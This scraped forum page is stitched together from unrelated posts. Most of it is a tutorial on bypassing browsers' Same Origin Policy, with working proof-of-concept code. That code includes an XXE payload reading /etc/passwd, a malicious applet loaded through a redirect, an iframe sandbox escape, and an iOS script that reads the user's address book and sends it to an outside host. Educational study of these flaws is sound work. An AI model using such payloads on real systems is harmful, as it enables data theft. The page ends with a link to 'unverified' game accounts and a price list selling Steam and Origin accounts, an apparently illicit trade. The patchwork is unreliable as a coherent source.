many cases, multiple hosts could be possible within the same root domain which accesses the source page’s DOM. Google is one example, which takes a series of sites’ authentication from the central authentication server. For instance, cart.httpsecure.org may take authentication through login.httpsecure.org. In such cases, the sites can use the document.domain property to allow other sites within the same domain to interact with the DOM (document object model). If you want to allow the code from cart.httpsecure.org to interact with the login.httpsecure.org, the developer will need to set the document.domain property to the root of the domain on both sites. i.e. document.domain = “httpsecure.org” This means that anything in the httpsecure.org domain can access the DOM in the current page. When setting up this way, you should keep in mind that if you deployed another site on the Internet, such as about.httpsecure.org, with some vulnerability, cart.httpsecure.org may vulnerable too and could be accessed at this origin. Let’s suppose an attacker is successfully able to upload some malicious code – then about.httpsecure.org would have same level of access as the login site. Understand SOP with CORS: Same origin policy weds cross-origin resource sharing Cross-origin resource sharing (CORS) is a mechanism that allows many resources (e.g. fonts, JavaScript, etc.) on a web page to be requested from another domain outside the domain from which the resource originated. Let’s suppose an application uses an XMLHttpRequest to send a request to a different origin. In this case you cannot read the response, but the request will arrive at its destination. That’s a very useful feature of cross-origin requests. The SOP also prevents you from reading the HTTP response header and body. The best way to relax the SOP and allow cross-origin communication with XHR is using cross-origin resource sharing (CORS). If the httpsecure.org origin returns the following response header, then every subdomain of httpsecure.org can open a bidirectional communication channel with httpsecure.org: Access-Control-Allow-Origin: *.Httpsecure.org Access-Control-Allow-Methods: OPTIONS, GET, POST, HEAD, PUT Access-Control-Allow-Headers: X-custom Access-Control-Allow-Credentials: true In the above response header, the first line describes the bidirectional communication channel. The second describes that the request can be made using any of the OPTIONS, GET, POST, PUT, HEAD methods, eventually including the third line x-custom header. Access-Control-Allow-Credentials:true specify for allowing authenticated communication to a resource. Understand SOP with plugins: Same origin policy weds plugins Note: If a plugin is installed for httpsecure.org:80, then it will only have access to httpsecure.org:80. Many SOP implementations in Java, Adobe Reader, Flash and Silverlight are currently suffering from different bypass methods. Most of the browser plugins implement the SOP in their own way, such as some versions of Java consider two different domains to have the SOP if the IP is the same. This might have a devastating result in a virtual hosting environment, which host multiple applications with the same IP address. If we talk about some plugins, such as Flash player and the PDF reader plugin, they have a long critical vulnerability history. Most of these issues allow an attacker to execute remote arbitrary code, which is far more critical than SOP bypass. In Flash, you can use the method which allows you to manage cross-origin communication, which can be done using crossdomain.xml, which resides in the root of the application file and might have some of the following code. <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain-policies="by-content-type"/> <allow-access-from domain="*.httpsecure.org" /> </cross-domain-policy> Using this code subdomain of httpsecure.org can achieve two-way communication with the application. Crossdomain.xml also supports Java and Silverlight plugins. Understand SOP with UI redressing: Same origin policy weds UI redressing UI redressing is a malicious technique of tricking a web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. UI redressing also known as clickjacking. For the attacker to bypass the SOP, it’s is little different. Some of these attacks rely on the fact the SOP was not enforced when performing the drag and drop function from the main window to an iframe. Understand SOP with browser history: Same origin policy weds browser history When we talk about browser history, the privacy of the end user always a concern. The same origin policy with browser history attack relies on traditional SOP implementation flaws, such as HTTP scheme having access to another scheme. Bypass SOP in Java Let talk about Java versions 1.7u17 and 1.6u45, which don’t enforce the SOP if two domains resolve to the same IP. Httpsecure.org and httpssecure.com resolve to the same IP (share hosting concept). A Java applet can issue cross-origin requests and read the responses. In Java versions 6 and 7, both have an equal method of the URL object. Two hosts are considered equivalent if both host names can be resolved into the same IP address. This type of vulnerability in Java SOP implementation is a critical issue when exploiting in virtual hosting environments where potentially hundreds of domains are managed by the same server and resolved to the same IP. The most important consideration concerning the privileges required by the applet to use the URL are BufferedReader and InputStreamReader objects. In Java 1.6, no user interaction is required to run the applet, however in 1.7, user permission is required to run the same due to the changes in the applet delivery mechanism implemented by Oracle Java 1.7. Now the user must explicitly use the click to play feature to run unsigned and signed applets. This feature can be bypassed using IMMUNITY and led to a subsequent (now patched) bug CVE-2011-3546 found to bypass SOP in Java. Similarly, a SOP bypass was found in Adobe reader. One of the security researchers Neal Poole found one issue: “If the resource used to load an applet was replying with 301 or 302 redirect”, the applet origin was evaluated as the source of the redirection and not the destination. Have a look at the following code: <applet code="malicious.class" archive="http://httpsecure.org?redirect_to= http://securityhacking123.com/malicious.jar" width="100" height="100"> </applet> Bypassing SOP in Adobe Reader Adobe Reader has number of security critical bugs in its browser plugin. Most of the security vulnerabilities are arbitrary code execution due to traditional overflow problems. The Adobe Reader PDF parser understands JavaScript. This attribute is often used by malware to hide malicious code inside PDFs. CVE-2013-0622, found by Billy Rios, Federico Lanusse and Mauro Gentile, allows bypassing the SOP (unpatched 11.0.0 version below). Where exploiting an open redirect which allows a foreign origin to access the origin of the redirect, the request that returns a 302 redirect response code is used to exploit the vulnerability. If we talk about XXE Injection, it involves trying to inject malicious payloads into the request that accepts XML input as below: <!DOCTYPE bar > <!ELEMENT bar ANY > <!ENTITY xxe SYSTEM "/etc/passwd" >]><bar>&xxe;</bar> In this XML parser that allows external entities, the value of &XXE is then replaced by the /etc/passwd. This technique can be used to bypass the SOP. It will load XE and the server will serve you with a 302 redirect response. Bypassing SOP in Adobe Flash Adobe Flash uses the crossdomain.xml file, which can control applications wherever Flash can receive data. We can set a restriction on this file to only trust mentioned sites as follows: <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain-policies="by-content-type"/> <allow-access-from domain="*" /> </cross-domain-policy> By setting the allow-access-from domain, a Flash object loaded from any origin can send requests and read responses. Bypassing SOP in Silverlight Silverlight is a Microsoft plugin that uses the same origin policy in the same way as Flash does. However, it uses clientaccess-policy.xml codes shown below: <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource path="/" include-subpaths="true"/> </grant-to> </policy> </cross-domain-access> </access-policy> Keep in mind that Flash and Silverlight have differences, such as Silverlight doesn’t segregate access between different origins based on scheme and port as Flash and CORS do. So, https://Httpsecure.org and http://Httpsecure.org consider the same origin policy. Bypassing SOP in Internet Explorer Internet Explorer 8 or below are vulnerable to SOP bypass in their implementation of document.domain. The issue can be exploited easily by overriding the document object and then the domain property. The following code demonstrates the same: var document; document = {}; document.domain = ‘httpsecure.org'; alert(document.domain); his code may cause a SOP violation error code in the JavaScript console if you run this in the latest browser. The same will work in older/legacy browser of Internet Explorer. Using XSS this can be exploited and can open bidirectional communication with other origins. References http://en.wikipedia.org/wiki/Same-origin_policy http://en.wikipedia.org/wiki/Cross-origin_resource_sharing http://en.wikipedia.org/wiki/Clickjacking https://browserhacker.com/ Source
-
SOP Bypassing in Safari To help you understand better, http://httpsecure.org and file://httpsecure are both treated as a different origin. The Safari browser (IOS and MAC) version 6.0.2 does not enforce the same origin policy when you need to access a local resource. When an attached HTML file tries to open using the file scheme, the JavaScript code contained within can bypass the SOP and start two –way communications with different origins. Consider the following page: <html> <body> <h1> I'm a local file loaded using the file:// scheme </h1> <script> xhr = new XMLHttpRequest(); xhr.onreadystatechange = function (){ if (xhr.readyState == 4) { alert(xhr.responseText); } }; xhr.open("GET", "http://httpsecure.org/docs/safari_sameoriginpolicy_bypassing/other_origin.html"); xhr.send(); </script> </body> </html> Now that the page has loaded the file scheme, the XMLHTTPRequest object is able to read the response after requesting the above mentioned code. SOP Bypassing in Firefox Firefox is the most used browser and the same origin policy bypassing was found by Gareth Heyes in October 2012. The issue found by him is critical and the company decided to fix it and stop its distribution. The issue found in version 16 resulted in unauthorized access to the window.location object outside the constraints of the SOP. The bypassing code is shown below. <!Doctype html> <script> function poc() { var win = window.open('https://httpsecure.org/abc/', 'newWin', 'width=200,height=200'); setTimeout(function(){ alert('Hello '+/^https:\/\/httpsecure.org\/([^/]+)/.exec( win.location)[1]) }, 5000); } </script> <input type=button value="Firefox knows" onclick="poc()"> Execution of the above code from an origin you control will also authenticate into httpsecure on a separate tab of he browser. This loads httpsecure.org/abc and the application redirects to https://httpsecure.org/ <user_uid>/lists (where user_id is your httpsecure handle). After 5 seconds, the exec function will trigger the window.location object to be parsed (here’s the bug, as it shouldn’t be accessible cross-origin) with the regex. This results in the httpsecure handle displayed in the alert box. In August 2012, when Mozilla released its version with support for HTML 5 sandboxed iframes, BRAUN found the issue that, when using allow-script as a value of the iframe sandbox attribute, rogue/fake JavaScript from the iframe content could still access window.top. This would change the outer window.location. <!-- Outer file, bearing the sandbox --> <iframe src="inner.html" sandbox="allow-scripts"></iframe> The framed code was: <!-- Framed document , inner.html --> <script > // escape sandbox: if(top != window) { top.location = window.location; } // all following JavaScript code and markup is unrestricted: // plugins, popups and forms allowed. </script> This code needs to specify with additional code allow-top-navigation, and allows JavaScript code loaded inside an iframe to change the location of window. An attacker could use this to redirect user/victim to a malicious website by hooking the victim of the browser. Note: In HTML5, a new iframe attribute was introduced, called sandbox. The main focus of this new attribute was to have a more granular and secure way to use iframes, with the limited potential harm of third party content embedded from different origins. The sandbox attribute value was set to be zero or the following keywords: allow-forms, allow-popups, allow-same-origin, allow-scripts, allow-top-navigation SOP Bypassing in Opera The same origin policy bypass was found by Heyes. The issue was critical, where Opera was not properly enforcing the same origin policy when overriding prototypes or the constructor of an iframe location object. Let’s take following code example: <html> <body> <iframe id="ifr" src="http://httpsecure.org/xdomain.html"></iframe> <script> var iframe = document.getElementById('ifr'); function do_something(){ var iframe = document.getElementById('ifr'); iframe.contentWindow.location.constructor. prototype. defineGetter__.constructor('[].constructor. prototype.join=function(){console.log("pwned")}')(); } setTimeout("do_something()",3000); </script> </body> </html> Following is the content framed from a different origin: <html> <body> <b>I will be framed from a different origin</b> <script> function do_join(){ [1,2,3].join(); console.log("join() after prototype override: " + [].constructor.prototype.join); } console.log("join() after prototype override: " + [].constructor.prototype.join); setTimeout("do_join();", 5000); </script> </body> </html> In the above mentioned code frame, the console value of constructor.prototype.join is native code used when join() is called on an array. After a few seconds, join() method is called on the [1,2,3] array and the printing function used previously is called again. If you have a deep look back at the above mentioned code, you will see that join() prototype gets overridden inside the do_something() function. Note: Heyes also found SOP bypass by overriding prototypes and using literal values, which were not filtered by Opera before. In the real case scenario, this bypass only works in a frameable web application, so if the application already mitigated vulnerability like CLICKJACKING by frame busting, X-Frame-Option: deny cannot be targeted or consider mitigated. Let’s take an example where the target browser has two tabs open in an Opera browser, where one is a hacked tab and the other is authenticated. If you create an iframe with an src tag in the authenticated origin, you can read the IFRAME content by which you can access any sensitive information. Same Origin Policy Bypassing in Cloud Storage If you think the same origin policy is limited to browsers and their plugins only then, consider this: cloud storage services are also vulnerable to SOP bypass. The same is also found in DROPBOX 1.4.6 on IOS and 2.0.1 on Android, and Google Drive 1.0.1 on IOS. All of these services offer you to store and synchronize files to the cloud. Roi Saltzman found this issue, which is a bit similar to Safari SOP bypass. This bypass relies on the loading of a file in a privileged zone: File://var/mobile/application/app_uuid If an attacker is able to trick the target into loading an HTML file through the client application, the JavaScript code contained in the file will be executed. In this attack, the file is loaded in a privileged zone which allowed JavaScript access to the local file system of the mobile device. FYI: if the HTML file is loaded using the file scheme, nothing prevents JavaScript from accessing another file like: file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb The above mentioned link database contains the user’s address book on IOS. In this, if the target application denies file access outside of the application scope, you can still retrieve the cached file. In this attack, if the user accesses this malicious link, the contents of the user address book will be sent to httpsecure.org. <html> <body> <script> local_xhr = new XMLHttpRequest(); local_xhr.open("GET", "file:///var/mobile/Library/AddressBook/ 150 Chapter 4 ? Bypassing the Same Origin Policy AddressBook.sqlitedb"); local_xhr.send(); local_xhr.onreadystatechange = function () { if (local_xhr.readyState == 4) { remote_xhr = new XMLHttpRequest(); remote_xhr.onreadystatechange = function () {}; remote_xhr.open("GET", "http://httpsecure.org/?f=" + encodeURI(local_xhr.responseText)); remote_xhr.send(); } } </script> </body> </html> Same Origin Policy Bypassing in Cross-Origin Resource Sharing (CORS) CORS is also vulnerable to the same origin policy bypass. CORS has misconfiguration of Access-Control-Allow-Origin: * The above mentioned code is a potential misconfiguration. Research says that more than one million applications misconfigured the Access-Control-Allow-Origin header. This allows any application on the Internet to submit a cross origin request to the site and read the response. The wild card value for the Access-Control-Allow-origin is not so insecure, if a permissive policy is used to provide content that does not contain sensitive information. Source
-
Conturi STEAM, ORIGIN neverificate http://pastebin.ro/0iem8XIQ
- 2 replies
-
- conturi
- neverificate
-
(and 2 more)
Tagged with:
-
STEAM ACCOUNTS: Counter-Strike 1.6 – 5$ Counter-Strike Source – 5$ Counter-Strike 1.6 + Counter-Strike Source – 8$ Counter-Strike GO – 9$ Call of Duty: Black Ops – 5$ Call of Duty: Black Ops 2 – 15$ Call Of Duty: Modern Warfare 2 – 4$ Call of duty: Modern Warfare 3 – 7$ Call of Duty:Modern Warfare 3+Black Ops+Modern Warfare2 – 8$ ARMA 2 ? ARMA 2: Operation Arrowhead (Day Z) – 10$ Hitman: Absolution – 7$ Left 4 Dead – 4$ Left 4 Dead 2 – 6$ Portal – 3$ Portal 2 – 5$ Brink – 4$ Killing Floor – 6$ Speedball 2 Tournament – 2$ Dead Island – 7$ SIN – 2$ Metro 2033 – 3$ Dota 2 – 3$ / Gift – 5$ Mafia 2 – 2$ ORIGIN ACCOUNTS: Command & Conquer 3 Tiberium Wars – 2$ FIFA 12 – 5$ FIFA 13 – 10$ Mass Effect 2 – 3$ Mass Effect 3 – 4$ Mass Effect 2 + Mass Effect 3 – 5$ Dragon Age II – 3$ Crysis 2 – 4$ Medal of Honor Standard - 4$ Need for Speed: Shift – 4$ Need for Speed: Undercover – 4$ Need for Speed: Hot Pursuit – 4$ Need for Speed: The Run – 6$ Battlefield 2142 – 4$ Battlefield 3 Standart Edition – 5$ Battlefield 3 Limited Edition – 7$ Battlefield 3 Back to Karkand – 8$ Battlefield 3 Close Quarters – 9$ Battlefield Bad Company 2 – 4$ Battlefield 3 + NFS The Run + NFS Shift + Fifa 12 – 12$ NFS Undercove+NFS carbon+NFS prostreet+Medal of Honor Airborne – 7$ ---------------------------------------------------------------------------------------------------------------------- In privinta altor jocuri si licente/invite pentru jocuri intrebati: 1) Skype: steamseller2 2) YM: steamseller3 Ma gasiti mai des pe skype decit pe YM. Plata se realizeaza doar prin PayPal! De dorit in $, dar acceptam si € (pretul in alta valuta il intrebati). La conturi garantia este la momentul tranzactiei, iar la licente – pentru totdeauna!